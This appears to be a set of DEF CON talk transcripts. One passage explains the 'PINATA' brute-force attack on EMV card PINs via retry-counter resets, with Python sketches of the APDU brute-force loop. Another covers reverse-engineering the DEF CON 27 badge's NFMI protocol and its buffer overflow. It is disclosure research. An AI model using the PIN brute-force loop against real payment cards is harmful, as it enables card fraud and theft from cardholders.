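    return f"unexpected status {sw1:02X} {sw2:02X}"

print(build_verify_apdu("0718").hex())        # -> 0020008008240718ffffffffff
print(interpret_sw(0x63, 0xC2))               # -> wrong PIN, 2 attempt(s) left
```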
One of the most common is when you remember the PIN: you can go to any ATM of the financial institution, and when you insert the card into the ATM using the correct PIN, the ATM internally is going to run the card management scripts, and it's going to reset the PRC to the value that it had before. Another way happens when the card contains the encryption and MAC keys for issuer scripts inside of the card. So, when the terminal generates the application cryptogram and sends the ARQC, basically for online approval, the financial institution is going to respond with the ARPC, which basically carries the approval or rejection of the transaction. But inside of this data, we are going to have the CSU, the Card Status Update, which contains some data that can update the card internally — and that could include a command to reset the PRC specifically. Let's imagine that we have a card, and we already tried three different PINs. So, we don't have any more attempts left in the EMV card. That means that we need to try to make a transaction to see if the financial institution resets the PIN retry counter. So, how can we do this? We can try to make a transaction with no CVM required, or we can try to make a transaction implementing the signature CVM. We can do this in different ways, but normally, with mobile POS devices, many of them implement no CVM or signature CVM here in the United States. So, the idea is that after generating the application cryptogram, the financial institution returns the ARPC. We can verify whether the PIN retry counter is set back to three, for example, or to five, depending on the configuration. And we can notice this in the last step of the transaction, when the ARPC is applied to the card. After this step, we can verify whether the PIN retry counter is set to the previous value, which should be three or five, depending on the implementation. But of course, this is an inadequate implementation — a bad practice. The best way to reset the PIN retry counter is by using an ATM at the financial institution, or by calling a representative from the bank, for example, to assign a new PIN to the card; after they use the card in the ATM, it is going to reset the PIN retry counter. But doing this type of reset after any transaction can be very dangerous. I'm going to show you why. So let's imagine that we have a normal authorization response from the bank, where basically I can see some changes between each response. This one is a normal transaction where it didn't receive any order to change the PIN retry counter. But in this slide, we can see different bytes that I can relate to the PIN retry counter — basically, to change it back to the previous value. So, to be able to use the PINATA attack, the card has to implement two different features. One is the plain PIN by ICC cardholder verification method, and the other is the PIN retry counter being reset for the user when the PRC is zero. With these two characteristics, we can run the PINATA attack against the EMV card. And I'm going to show you how I did my setup to run this PINATA attack. To run the PINATA attack, we need to build a special ELMA setup. For this specific case, I'm going to use the GPD Pocket 2 small computer, or pocket computer. It's one of the most powerful devices of this size, specifically for doing different things. But you can use any other device that you have available to do this type of setup. Also, we're going to use the cheapest card reader that you can find on the Internet, the SCR3310.
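Reading the real card through the SCR3310 from the pocket computer can be done with the pyscard library; a minimal sketch, assuming the reader is the first one PC/SC enumerates. The transmit helper returns the (data, sw1, sw2) shape that the other sketches in this section expect.

```python
from smartcard.System import readers
from smartcard.util import toHexString

def connect_first_reader():
    """Open a connection to the first PC/SC reader (e.g. the SCR3310)."""
    rlist = readers()
    if not rlist:
        raise RuntimeError("no PC/SC reader found")
    connection = rlist[0].createConnection()
    connection.connect()
    print("ATR:", toHexString(connection.getATR()))
    return connection

def transmit(connection, apdu: bytes):
    """Send one APDU and return (data, sw1, sw2)."""
    data, sw1, sw2 = connection.transmit(list(apdu))
    return bytes(data), sw1, sw2

if __name__ == "__main__":
    conn = connect_first_reader()
    # SELECT the payment system environment just to prove the channel works
    # (the contact PSE would be "1PAY.SYS.DDF01"; this uses the "2PAY" variant).
    data, sw1, sw2 = transmit(conn, bytes.fromhex("00A404000E325041592E5359532E444446303100"))
    print(toHexString(list(data)), f"{sw1:02X} {sw2:02X}")
```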
What it's basically going to do is let us extract the original EMV data from this reader. So our financial card is going to be inserted in this reader. So basically, with the pocket computer, we're going to start reading the card and we're going to process the data. And after that, we're going to send it to the ELMA board. So we're also going to need the ELMA board, of course. And we're going to need the SumUp payment system. Basically, it's a payment system that you can implement on a cellular phone. So you have an application and you can make payments directly to this device. The idea of having these devices is to be able to control the payment environment, basically. So the idea is that the ELMA at this point is going to simulate a real EMV card to the SumUp, but it's going to process the data that we extract from the card reader, basically, because we're going to use a mobile payment system and we are going to have the application for the SumUp payment system on our cellular phone. We need to implement the Auto Clicker application. What the Auto Clicker is basically going to do is play an important role in helping us automate different tasks. For example, let's say that we try three different PINs and we need to make a new transaction to reset the PIN retry counter. The Auto Clicker is going to do that automatically for us. So that's one of the most important parts in this PINATA attack. So this is my setup. I have the Pocket 2 basically in the middle. We have the card reader, the SCR3310, from where we are going to extract the original data from the card. On the other side we have the ELMA board connected by USB. This could be a relay over the internet, but for this demo we are using a local connection. The ELMA is going to simulate the transaction and connect to the SumUp. So when the SumUp sends the first command, the ELMA is going to process it and send it to the client on the pocket computer, and the pocket computer is going to send that command to the card. What the client side is going to do is start checking for certain flags. Let's say I activate the PINATA attack: it's going to detect when we are in the verification phase, and after that we are going to start making the brute force attack against the PINs. After we have a zero on the PIN retry counter, we are going to start a new transaction to reset the PIN retry counter. And after we have another three attempts on the counter, we are going to start the process again to make the brute force attack against this EMV card. Internally, the computer is going to be running a virtual card reader, which is going to extract data from the physical card reader and send this data to the ELMA board. Basically, it's there to process the data internally and after that to present this data to a terminal. The idea of implementing a virtual card reader is to be able, basically, to emulate a card reader, but simultaneously to be able to modify data in real time. To visualize the PINATA attack: what it does, basically, is after a transaction it checks if the plain PIN by ICC verification method is available. If it is, it checks the PIN retry counter. If it is greater than zero, that means that we have the possibility to make a brute force attack. If we couldn't find the PIN, we basically repeat this cycle until we get the correct PIN. Having said that, we can go directly to the demo.
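That check-then-retry cycle is easy to express in code. Below is a sketch of the client-side logic as I understand it from the description: read the PIN Try Counter with GET DATA (tag 9F17), burn the available attempts with VERIFY, and hand control back to the auto-clicker/mPOS step whenever the counter hits zero. The transmit and trigger_reset_transaction callables are placeholders for whatever transport and transaction trigger are actually in use; this is an illustration of the flow, not the ELMA client's code.

```python
import itertools

GET_PTC = bytes.fromhex("80CA9F1700")          # GET DATA for tag 9F17 (PIN Try Counter)

def read_pin_try_counter(transmit):
    """transmit(apdu) -> (data, sw1, sw2). Returns the counter, or None if unsupported."""
    data, sw1, sw2 = transmit(GET_PTC)
    if (sw1, sw2) != (0x90, 0x00):
        return None
    return data[-1]                            # response is TLV: 9F 17 01 <counter>

def verify_apdu(pin: str) -> bytes:
    """Plaintext offline PIN VERIFY, same layout as the earlier sketch."""
    block = f"2{len(pin):X}" + pin + "F" * (14 - len(pin))
    return bytes.fromhex("0020008008" + block)

def pin_try_loop(transmit, trigger_reset_transaction, candidates=None):
    """Sketch of the brute-force / reset cycle described in the talk."""
    if candidates is None:
        candidates = (f"{i:04d}" for i in range(10000))
    candidates = iter(candidates)
    while True:
        ptc = read_pin_try_counter(transmit)
        if ptc is None:
            raise RuntimeError("card does not expose a PIN try counter")
        if ptc == 0:
            trigger_reset_transaction()        # no-CVM / signature transaction via the mPOS
            continue
        batch = list(itertools.islice(candidates, ptc))
        if not batch:
            return None                        # candidate list exhausted, no PIN found
        for pin in batch:
            _, sw1, sw2 = transmit(verify_apdu(pin))
            if (sw1, sw2) == (0x90, 0x00):
                return pin
```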
So first I'm going to run the client software to start making the first transaction. Here is where the clicker is very handy; it's going to help a lot with all the transactions that we are going to need. After we make the first transaction, we are going to check the PIN retry counter to see if it's greater than zero. If it is, we are going to try to brute force the PIN, using a list of possible PINs to try. If we couldn't find the correct PIN, we are going to make a new transaction to reset the PIN retry counter. And after we reset it, we try the brute force attack against the EMV card again. If we couldn't find it, we repeat this cycle until we are able to find the correct PIN. And on this last try, we are able to find the correct PIN. It's 0722, which basically is the PIN that we can use to make a transaction with the card. At this point, we can use this card in an ATM or to make a purchase in any store, using the correct PIN. I want to say thank you to the people that helped me a lot in this research, especially the Metabase Q team, for all the details and support. And thank you for being part of DEF CON 29. I hope you guys keep enjoying this event.
|
A brute force attack is a trial-and-error method used to obtain information such as user passwords or personal identification numbers (PINs). This attack methodology should be impossible to apply to the actual secured EMV bank cards. In this talk, we will analyze how an inadequate implementation could rely on an extreme and sophisticated PIN brute force attack against 10,000 combinations from 4 digit PIN that could affect millions of contact EMV cards.
|
10.5446/54235 (DOI)
|
Hello, welcome to my talk on hacking the DEF CON 27 badge. My name is Seth Kintai; my background is hardware and computer security, so this project was a lot of fun for me. I just wanted to give a little background on some of the terminology we'll be using in this presentation. NFMI, Near Field Magnetic Induction, is basically using magnetic fields to communicate instead of radio waves. Magnetic fields decay at a much faster rate than radio does. It passes through body tissues better, so it's better for short distances, for body area networks. The short distance supposedly makes it more secure, and it's more efficient. It hasn't been used too much; it basically uses two coils to communicate with each other, sort of like electromagnets or half of a transformer talking to each other, instead of using antennas. It's used in proximity cards as part of the NFC protocol, and it's used in some hearing aids and I think some earbuds, but not too many other places. Maybe they had dreams of putting it in Apple earbuds, because I read that somewhere in a blog, but the company was extremely cagey about any sort of information on these chips. There was no data sheet at all, which is bizarre. No info on the protocol, no dev kits, no samples. If you wanted to order anything, you had to order tens or hundreds of thousands and sign an NDA. You just couldn't find any real official info on these chips. Software-defined radio is basically taking all the hardware guts, making them virtual, and putting them into software, which makes designing new radios and mixing and matching parts much easier and more fun. I use GNU Radio to do that sort of thing — modulate and demodulate signals — and some other tools for that too. I used a HackRF to receive and transmit my signals and tune them. There are no antennas, but I made a bunch of coils by just wrapping magnet wire, and I should probably have some pictures of those online at some point. And I used Python for everything else. A few other terms you should know: a buffer overflow attack — I'm sure most of you are familiar with how that works. Basically, just blow away everything on the stack and keep on writing until you overwrite the return address and take control of a program. SWD and JTAG are different low-level hardware debug interfaces — like GDB, but super low-level. You can control the clock one cycle at a time. Fun stuff. And then a convolutional code, basically an error correction code, spreads out bits over multiple symbols to make them more resistant to noise. So the badge is part of a game. The badges communicate with each other, and they make little beeping noises and blink lights when they pair with each other. And then if you paired with a magic badge, it would advance the stage of the game you were in. There were six stages, and you'd advance once for each of these different magic versions of the flavors of badge. And then once you got all of them, you won by getting a piezoelectric Rick Roll. And the badges are actually cut from pieces of stone, and there's a great presentation on that you should check out. The badge hardware has an MCU that does most of the work — controls the lights and speakers and whatnot — and talks to the NFMI chip over UART. When the MCU boots up, it loads firmware, and in that firmware there's a little patch of firmware for the NFMI chip, and it sends that over UART and patches the chip on boot up. The hardware debug interfaces are labeled in this picture.
You can connect by serial and talk to a console that's running on the MCU, or you can connect to SWD and do some really low-level debugging. There are no connectors on there — in that picture, there's a connector soldered on to the serial port, but otherwise they're just unpopulated connector footprints for now. You can either solder on a connector, solder wires on directly, or use a pressure fitting. The badges communicate in a sort of bizarre way. When the badge MCU wants to transmit 8 bytes, first it adds a D to the beginning, then pads every single 4 bits — every nibble — with a D, then ends it with an ASCII E and sends that over UART. The NFMI chip receives that, immediately strips all of that padding off, and transmits it. The receiving badge receives that, puts all that padding back on again, sends it over UART, and then the badge strips it all off again. Early on in the game, someone had pulled the firmware off the badge, so I decided to reverse engineer it and looked through it, and after a few hours of that, someone — I think it was Joe Grand — actually released the source code. It was sort of wasted time, but on the other hand, I'd never actually seen all the correct answers when reverse engineering code before, so it was a new experience. So I started by plugging it into Ghidra; it didn't work very well back then, and I still don't know if it does now. I ended up using an old version of IDA Pro, and it worked a lot better. While plowing through with IDA, I found a buffer overflow, and it seemed so obvious, I was sure it had to be part of the game. As you can possibly tell from the code, it's basically reading bytes into a buffer until it finds a letter E. That buffer is 18 bytes total, but there's no limit at all — it will just read and read and read and read until it finds that E. I made a proof of concept early on; I wanted to make sure this buffer overflow was actually exploitable. So in Notepad, I wrote up some ARM code and just used an online assembler to convert that into machine code. And I wrote this little script here to use a J-Link over SWD — not JTAG. I connected to the badge, loaded my payload into the ring buffer, set the transmit index and the receive index values, and told the badge to run. It thought it had a giant packet, and we'll see what happens. This is the serial console for the badge; I'm telling it to receive a packet. Now I'm going to send it one, a regular valid packet, and that's what it displays. Now I run my hack through J-Link, so now there's an oversized packet sitting in the ring buffer. The next time I tell the badge to receive it, my code takes over and prints 'Hack the Planet' on the screen. That worked, so now I just need to figure out how to send a gigantic custom-crafted packet. So I dug around online for specs on this chip used on the badge, the NFMI chip, found a few details and good guesses on frequencies and bandwidths, and a pretty good guess on the modulation from a lot of random sources. I started looking at the signal in analog. First, on the top row you see 16 bursts over about 10 seconds. In the middle row I have magnified one of those bursts; you can kind of see where the different sections are. The bottom row lets you see the four distinct sections of each burst. Section one seems to be timing pulses: it sends the carrier frequency and then one that's 150 kHz higher and then 150 kHz lower.
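Before getting into the RF side, a quick aside on that UART padding scheme: here is one reading of it in Python — each data nibble carried in its own 0xDn byte, framed by a leading 'D' and a trailing ASCII 'E'. The exact framing bytes are my interpretation of the description above, not code taken from the badge firmware, so treat them as assumptions.

```python
def pad_for_nfmi(payload: bytes) -> bytes:
    """One interpretation of the badge's UART framing: ASCII 'D', then each data
    nibble expanded into a 0xDn byte, then ASCII 'E'."""
    out = bytearray(b"D")
    for byte in payload:
        out.append(0xD0 | (byte >> 4))     # high nibble, tagged with D
        out.append(0xD0 | (byte & 0x0F))   # low nibble, tagged with D
    out.append(ord("E"))
    return bytes(out)

def strip_padding(framed: bytes) -> bytes:
    """Reverse the framing: drop 'D'/'E' markers and fold nibbles back into bytes."""
    nibbles = [b & 0x0F for b in framed[1:-1]]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))

pkt = pad_for_nfmi(bytes.fromhex("DEADBEEF00112233"))   # an 8-byte badge payload
assert strip_padding(pkt) == bytes.fromhex("DEADBEEF00112233")
print(pkt.hex())
```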
It doesn't seem to be transmitting any data, but it may be doing this just to establish a range of frequency and amplitude of the signal as well as timing. Quick note on down conversion, if you're not familiar with the subject, you're not demodulating the signal, you're not changing it all other than lowering the frequency by multiplying it with another signal. You're trying to think of it like a beat frequency in music. So you're just shifting the signal down from say 10.569 MHz, you're shifting it down to 0 MHz. So now all the energy is around that plus or minus 200,000 KHz. You can see how the signals that were at the carrier frequency are now basically flat lines because they're almost zero. And a whole bunch of squiggles that didn't look much different from each other are now much more clearly data. You can see there's repeating patterns in them. So section two has these patterns that place them twice. Sometimes exact copies, sometimes they're inverted, sometimes they swap places between I and Q. And there's only, I think, eight different patterns it shows. I ended up calling these preambles based on them showing up later in the other packet. Section three just seems to be more timing. I tried my best to get it to be exactly zero hertz and never quite could. And then the frequency would drift, I think, with temperature. I don't really know. And then section four was data. It's 271 copies of the same data packet. Each one starts with eight variations of those preambles you saw in section two are almost exactly that preamble. It's slightly different. And then followed by data and then a brief null or pause. And sometimes they are exact copies of each other. It sometimes are inverted. Sometimes the I and Q swap just like with the preambles in section two. The modulation used is D8PSK. PSK is phase shift keying. It's basically modulating a signal so when you plot it, it shows up as, the burst show up as one of those eight dots on the constellation. You'll actually form that on a plot as long as your timing is right. The eight refers to there being eight points in that constellation and then D means differential. So it's the difference between each point is where your actual data is transmitted. And each of those points is called a symbol. The center frequency seems to move a little bit. In the beginning, I had one frequency that I just narrowed down to a very precise frequency. It was working very well until I broke the badge and then it switched to 1.4. And then later on I fixed another badge I had broken earlier and it was using 1.569 megahertz. So I don't quite understand why the frequency bounces around so much. I was initially using a sample rate of two million samples per second, but the timing didn't work out. I said, oh, well, obviously, if it's 596 kilohertz bandwidth, then I need to use a multiple of that for the sample rate. So I used 1.192, but that didn't work out either. And I ended up using this 1.19055 and that worked out perfectly for 440 samples per packet or four samples per symbol. Why that number? I don't know. I'm using hackrf to receive the signal. It does the down conversion and resampling, so I can use it easier to use frequency and use a much lower sampling rate because your sampling rate must be at least twice your highest frequency in your signal. And then I used GNU radio to write my demodulator. Now there were some examples online of some lower order, like some 4PSK demodulators and modulators. 
And I figured it would be easy enough to modify one of those into 8PSK, but it ended up being a nightmare. The examples used components that don't exist or never worked or were broken for other reasons and not documented and no one could help and the docs were amassed. It was kind of a nightmare. So I made a bunch of working examples of different flavors of my PSK modulators and demodulators and I put them all on GitHub to help other people out. Now I had to deal with noise and nulls. There's 271 copies of the same packet, but they varied a bunch. But only some of that was the noise. It turns out that because of those null symbols at the beginning, a normal PSK demodulator doesn't understand what those are and tries to put them into one of those 8 quadrants. So it kind of interprets them as 8 for 3 random symbols. And then after those nulls there seemed to be an actual random symbol, which is why there was 8 different variations of both the preamble and of the packet. Now the nulls were new to me all together and you could maybe even call it like a sort of a ninth symbol in a constellation. I googled around trying to find out other examples of it and NXP, the maker of this NFMI chip, they also make this CoolFlex DSP audio chip and it also uses a similar modulation scheme with nulls and those nulls are used for finding the timing of a signal. So my demodulator spits out a stream of symbols, which I then manually parsed here just to make them more readable. You can see section 1 is 21 copies of just blasts of that signal basically junk in those symbols. Section 2, we see that preamble copied twice, followed by a little bit of noise and I think mostly nulls. Section 3 is just some more timing blasts and then section 4 is where our actual data lives. These are the symbols for our packets, 271 copies of them, they should be identical, they're not because of some noise. So I had to write a Python program to basically ignore the first few bytes or few symbols, then count up all the different patterns of packets that each flavor packet are in there and then whichever one has the most copies is judged to be the correct copy and that's the one copy of that one is output. The preamble consists of 20 fixed symbols and then 12 that can be in one of three patterns. Section 2 seems to flip randomly between two different sequences of those 12 preamble symbols. I don't know what they meant, I assumed that the one with mostly zeros could be like the mast for all zeros but it doesn't quite seem to be right, it could be, I don't know, never really figured that out. And then section 4, every single packet always starts with the same preamble, which is different than the other two. And here we see the structure of the entire packet, we got the header that has those nulls and that little random byte or random symbol referring to as the primer and then the preamble, then we have the packet data which is 64 symbols corresponding to 16 bytes. The first four bytes appear to be a counter, then there's one byte that is used as the length field for the user data and then there's 11 bytes available for user data but the badge only uses the first eight, the last three are just left unused. And then the footer has what, well, 10 symbols that change with every single packet as the counter increments so I assumed it was a checksum or CRC of some sort. 
Now I need to find the mask, the zero mask for all of the data because if you fill a packet with zeros in the data fields you don't get a packet full of zero symbols, you get a random looking pattern of symbols. This is the mask that they've used to either obfuscate what's being transmitted or maybe it's used for spread spectrum or noise resistance or something, not entirely sure but basically when you send an empty packet you don't send all zeros, you send a pattern. So I was able to easily change the first eight bytes to zeros and confirm that there's this crazy mask. Later on I modified the firmware to allow me to send the MCU badge firmware to allow me to send 11 bytes in a packet, set all those to zeros and that's what the pattern you see on the bottom of the screen. Though I didn't actually see any sort of pattern in this pattern. Finding the mask for the other data bytes was a little more difficult. I was basically able to confirm that the counter was counting, it was counting by binary values except it was counting by twos. I didn't know if it was starting off odd or even, I basically had to guess. Because of the tail that it has in changed symbols that was covering up some of the other symbols. So I needed a way to figure out something. I observed the counter incrementing in that binary fashion, decided well I'll just record it for a week. Eventually it found that after about a week it finally flipped the tenth symbol. So I was able to get ten of the mask symbols and then the tail changed afterwards. I have no idea what those bits are so I don't know if they're ones or zeros. Only the green is what I'm positive or so I thought were zeros based on my guess of what was odd or even at the beginning. I realized that it took 19.1 hours to get the ninth, almost a week to get the tenth symbol. It was going to take decades to get 16 symbols and over 9000 years to get all 20. I tried to brute force them but I just didn't know enough about the math of what was going on with these symbols and the values. So I couldn't brute force them and I needed a smarter way. Then I got lucky by becoming unlucky. I murdered a badge. I got really angry, it started transmitting a weird pattern instead of 110 symbol packets. It was doing 108 symbols and 108 nulls. It transmitted a different frequency and even weirder. The counter slid over by 4 bytes. So now instead of counting at byte 0 for 3 it was counting at 4 through 7. I assumed initially that it set those first 4 bytes to all zero. But by watching it count the upper bytes that let me confirm the mask for the length byte and helped me to do some other bytes as well. So I finally got the mask of the first 5 bytes. So at least assuming my 0 slash 1 guess was correct. It was odd or even that I was starting with. So sometimes it's better to be lucky than smart. So I finished this up. We'll kind of fast forward to the future a little bit. But I later on discovered that whenever you update the transmission badge or the packet that the badge transmits to other badges. It makes the counter count whatever it's counting count super fast. Almost 350,000. So I wrote a script to count over and over and over and that advanced all the bytes of the counter which let me confirm more mask bits. It also let me confirm that my initial guess was 0. Well that and the erratic counting later on in the future when I was decoding the sequential count. But should be sequential. It wasn't always sequential. It was bouncing around by 8 or 32 here and there. 
And I realized because my initial guess was wrong. So that guess that what I found above as a mask was actually the mask for the value of 1. It was really a mask of 0. But that also means that when I broke that badge instead of all the bytes being 0 it was also started at 1 which is weird. I don't know what that means. Next I need to find the checksum mask but really there's no way I can figure that out right now. All I can do is at least until I figure out the algorithm and then figure out the data and then figure out which part of the packet that the algorithm actually protects. Like does it protect the preamble or not? You know. So basically I just guessed by picking symbols that I already seen in the packet called that 0 or just whatever and moved on. So one thing that the counter indicated was convolution code is being used. So for every odd bit that's changed whereas we're defining an odd bit as bit 1 with LSB being bit 0. So bit 1, bit 3, bit 5, any of those change. Only a single symbol is changed. But if an even bit is changed then 6 of the next 7 bits or symbols are changed. Now that pattern looked suspiciously like the one used by the Voyager space probe. I don't know if that's coincidence or if that's somehow been adapted to use this into the badge transmission. I haven't figured that part out yet. It's also odd that only half of the bits are being protected because normally you'd want to protect all the bits from noise only having half. It doesn't do you much good. So to reverse engineer this I started by changing just one bit at a time whenever you change one odd bit. That would just change one symbol and it always adds 4 to the symbol. If you change one even bit then 6 of the next 7 symbols change and in a pattern that depended on how far away that symbol was from the bit that was changed and based on the 0 mask that was used at that location. So I figured out the pattern through just a lot of making examples and taking lots of notes and making crazy excel sheets. And finally figured out the math of how a mask changes each bit at each position. I've listed it by the symbol positions and then also listed it twice in 2 ways. One is the code, the Python code of where the mask is, what values the mask is and then if that mask existed at that position, like say mask is in 1, 2, 1, 2, 5 or 6. So if it is and that's a 1 times 4 plus 2. And as a more lower level electrical engineer sort of way to think about it I also included an array of bits. So you can look at the bit math and possibly that could be related to the Voyager Pro but we'll worry about that later. So that figured out for a single bit but once you start using 2 bits or changing 2 bits at a time then the math gets really ugly again and it just goes crazy. And I tried coming up with really complicated algorithms to figure it all out but I eventually realized well instead of doing that let me just treat everything as just a mask. Every sum of every step is the mask of the next step and made 7 different steps like that and it all worked out. So here it is stepping through that where you start off with the mask and then if you follow those rules from earlier to change, if a bit changes then you add say 6. Compute the sum, that sum becomes the mask for the next row, the next, the next, the next. So that rule of course doesn't make any difference if you're only changing 1 bit but when you're changing 2 bits say if the mask is 3, position 0 you add 3 plus 2 you get the sum of 5. 
Now you use 5 as the mask for the next bit down on and on and it actually worked. Except when I started decoding the counter it didn't always count sequentially, it did most of the time but every now and then it would freak out and then go back to working again. And I realized that sometimes odd bits are convolved when it's multiple odd bits that have been flipped. But there wasn't much rhyme or reason to it, I just started looking for patterns and any time I found a pattern that worked for a lot of the problems that would code that pattern out. That would solve most of them but then a few more would slip through, just did that a few times and ended up with these 4 rules. All of the rules are interesting that they don't care what the current bit is, they only look at previous bits. Some of them, 2 of the rules care if previous bits were 0 instead of 1, all those X's are the don't cares. You can see the rules are mostly don't cares. But now we know the answer that all the bits have some sort of convolution code protecting them. The first convolution code that we saw earlier could be that Voyager code, could be a Trellis code modulation, I don't know if that's actually possible. But I won't go into that. And then the other convolution code is, I have no idea. I made that little circuit diagram for how I think it works but other than that I didn't recognize it in anything I looked up online. So now I need to reverse engineer the CRC. And early on I noticed that each packet, the CRC has a possibility to contain basically 20 bits of data in those 10 symbols. But when I count it up, the number of patterns that actually showed up, it was only 2 to the 12 or 4096 patterns. So that was telling me it was storing 12 bits in 20 bits, which was strange. And then there was also the issue that when you change a bit, you can have a tail of up to 6 changes behind it. And won't that tail of changes overwrite the nulls and primers and destroy the packets? So something odd was going on here. I also confirmed that all of those symbols had to be used because if you tried changing any of them, then the packet was rejected. So clearly all those symbols were being checked. So they all were important in one way or the other. And so I need to reverse engineer the CRC if I ever wanted to make some of my own custom packets. I tried this tool called CRC Revenge and it just didn't seem to work at all on the values I was pulling out. So I said, fine, screw it, I'll just write a Python program and brute force every possible CRC algorithm. And that didn't work either. So something really odd was going on. While looking through the CRC values of a bunch of packets in sequential order, I noticed that the checksum was changing by a predictable amount. Like every time just the lowest bit changed, it was XORing the checksum value by the same amount. Which told me that the checksum was being built up by XOR probably from a table, just like CRC. And I hope to do that some more, eventually find a pattern to it. But in the beginning what I did was I used all the counter values to find where just a single bit changed between two packets. XORed those packets, or XORed the CRCs from those and that gave me the XOR value for that single bit change. Did that for all the counter bits. Did that for a few of the length bytes. Couldn't really do it for all the counter because the high counter values would just take months to flip through. But since I realized that when you update a packet it fast forwards it by some 350,000 clicks. 
So I wrote a program to speed it through a whole lot of those bits. And then I wrote another program to do a bit walk. Basically change one bit in every data byte and walk that back and forth through all the data bytes. And then I wrote a cute little program to adjust all those and build up the CRC table. Now that I had most of the CRC table values for each bit, I was looking through the changes in them and noticed a couple patterns. And the first was a pattern in how the actual data bits are stored in those symbols. And it's kind of ingenious the way they're spread out. So the first two symbols holds four bits and the next symbol after that holds two bits. So basically the way that it spreads them out where the even bits are used and only the first three symbols, those even bits since they have a tail that can be six long, that tail doesn't extend past the end of the CRC. So it doesn't overwrite the nulls or anything like that. So basically it used mostly the odd bits to store bits from the CRC and just a few of those even bits. And it all fit. And then for just extra fun, I guess, they shuffled the order of those bits all around. And that shuffling is what made the CRC revenge fail, what made my brute force tools fail. Once I removed the dead bits and rearranged the bits that actually had useful info in them, then suddenly CRC revenge worked perfectly. So now I can compute the CRC table for all 16 bytes. I also noticed a pattern between the values for every single bit in my table. I can use that pattern to fill up the rest of the symbols. But with CRC revenge, that also showed me the exact name and algorithm used for the CRC. So that was nice. So now my original guess for the mask, I knew it was wrong in the beginning for the CRC zero mask. But it worked anyway because basically since the CRC is built up by XORs and it was basically XORing my bad mask, which had my bad base value and all those XORs were cancelling out. And it worked most of the time, but it was flaky probably because of those three bits of the tails that weren't quite XORs the way the tails changed. So once I figured out the new mask, everything worked like rock solid. It was beautiful. I think the CRC doesn't protect the preamble. I think it's only covering the data. I tried coming up with counter examples. I tried making a ton of different packets with using different preambles and testing all possible CRC values and couldn't make any other preamble work. So that's just an unknown. Also, I basically went with the assumption that the CRC of those 16 bytes, if they were all zero, that the end result would be zero because that's how CRCs work. And based my mask off that, and it worked. So with that, I can finally craft my own packets. Tools will be released on GitHub if they haven't been already. I can now basically make any 16 byte packet I want, except I need a 36 byte packet in order to overflow the badge and possibly even more to do any cool attack. To do this from the start, I assumed that would fall into place along the way, but it didn't happen. I never found a field in the packet that actually let me set a longer packet length. Screwing around the preamble didn't work. So it was time to try reverse engineering the NFMI firmware. To extract the NFMI firmware, I needed to run SWD. I needed to be able to access the reset line, which unfortunately was buried in the middle layer of the board. The ball on the ball grid array on the bottom of the chip also was not accessible. 
So I had to pick through slides and other info from the presentation, figured out which ball on the grid it was, and then I zoomed in really close on some of the slides that didn't have the middle image. It's from the slide. That's the circuit board before it has the white paint on it, so you can kind of see the middle traces faintly in the middle of the board. Also with one of my badges, I scraped all the white paint off and cut through the bottom layer of the badge to remove the metal ground plane and was able to shine light through it. Eventually Joe Grand actually was nice enough to send me some schematics that showed exactly where the reset lines were just to confirm. That helped me find the reset line. Now I need to connect to it. So as you can see in the top, I had to scrape the paint off and the top layer of the board to get down to that middle layer of the board. Kind of made like a little sea of flux on it based on a video I watched of repairing iPhones. So a little sea of flux and after a few tries I was able to solder a wire onto this trace that was smaller than human hair. I think this didn't actually work though. I had to go back and actually cut the trace and then do it again because the MCU was still connected to the reset and was like changing the reset while I was trying to change it with the SWD commands. So I think, I don't know, I think that second uglier image onto the right of the soldering is the second time I did it. So I was able to connect to it but when I hooked the J-Link up to it, to the SWD, it could not communicate with it because I didn't know what kind of chip it was. I was guessing different Cortex chips and nothing worked. I thought, well maybe I need pull-ups, maybe I need pull-downs, maybe there's noise, maybe I need to go slower. I tried everything, I tried going at like 1 kHz and nothing was working. So finally, out of desperation, I just started randomly trying the default settings for a whole bunch of different chips that were related or even kind of unrelated and then one of them just worked. So I quickly downloaded the entire memory space I could which was 0-18000 and realized at that point because I guess, I don't know, either screwing around earlier with the reset line being connected to two things or maybe cutting it or maybe just based on the way it boots up but whatever little snippet that the MCU firmware sends over to the NFMI chip wasn't there. So the protocol was missing but at least I got all of the other hidden stuff because the protocol only makes up like a few hundred, maybe a thousand bytes and I got a whole lot more than that and all those hidden functions and stuff so that was very helpful. So I pulled the NFMI protocol bit out of the MCU firmware figured out the base address of the different pieces of it and plopped that into the binary just pulled out that 18000 binary and stuck that into Ida Pro. Once again, I couldn't find anything indicating like a packet length field or anything like that and I also confirmed there's code that actually checks to make sure you're not claiming to send more than 11 bytes and fast forward to the future, I was able to remove that at one point it doesn't do me any good because I can't send more than actually 11 bytes so if I fake it, it'll try outputting it but it's outputting like zero that uninitialized garbage and it wasn't helpful. But I had seen oversized packets happen before and I'd even log them. 
As you can see in that log down there I'd hacked a badge firmware to spit out every byte received and the length and after a bazillion length 22s I got a length 52 and then it crashed so welcome to Defconn again. So obviously it's happened spontaneously in the wild, how do I make that happen? Well I was saved by some more bugs in the badge firmware. So when the NFMI chip sends a packet over the UART and it's all padded out, the badge receives it but instead of trying to copy the entire packet off of UART, it just copies one at a time. So that alone allows a partial packet to be copied if it runs out of space and then there was also this off by one error where it seemed to make sure there was always one more spot free. So basically it's checking for two bytes free before copying one byte and that allowed an odd number or an odd sized packet which was nice because it would just chop off just the E at the end and leave my B followed by however many bytes of data I had on there. So then later on when the badge actually tries to use that packet data, it starts with reading it to B and keeps on reading until it finds an E. So with these errors I was able to send a B and then 16 bytes of padded data and then no E. I can completely fill up the ring buffer by just sending a whole bunch of these and then I tell the badge to read and the moment it reads the first one now it's freed up 18 more bytes. So if as long as I'm still blasting these packets, it'll now write a second packet into that hole. So and then the badge will keep on reading everything and when it gets to that last packet, it sees a B and then 16 bytes of these padded nibbles and then another B and then another 16 and then an E. So as far as it's concerned, it just saw a 33 byte packet. But wait, there's more. So if you keep hammering that even more, it's possible to send even like the max size 11 bytes which ends up being 22 these padded nibbles. So I can send like a B22 and then it hits that off by one error and chops off the E and then when a packet gets read, it frees up enough space that if I'm still writing fast enough or transmitting fast enough, it can stick another B22 in there with no room for the E and then since the badge is reading faster than I can actually transmit, by the time I send a third one, it'll be more than enough space for that E to fit in there too. But basically I've now made a 68 byte packet. And then I haven't actually played with this but I could probably even fill the buffer first with like super tiny packets, like 2 byte packets to make reading take much longer and maybe you can stack even more than 3 of these B22s in our B22Es. So now I can crash a badge at will, a stock badge. This takes a long while with a 2048 byte buffer and it makes like a pretty boring demo. So I cheated and I made a badge that just 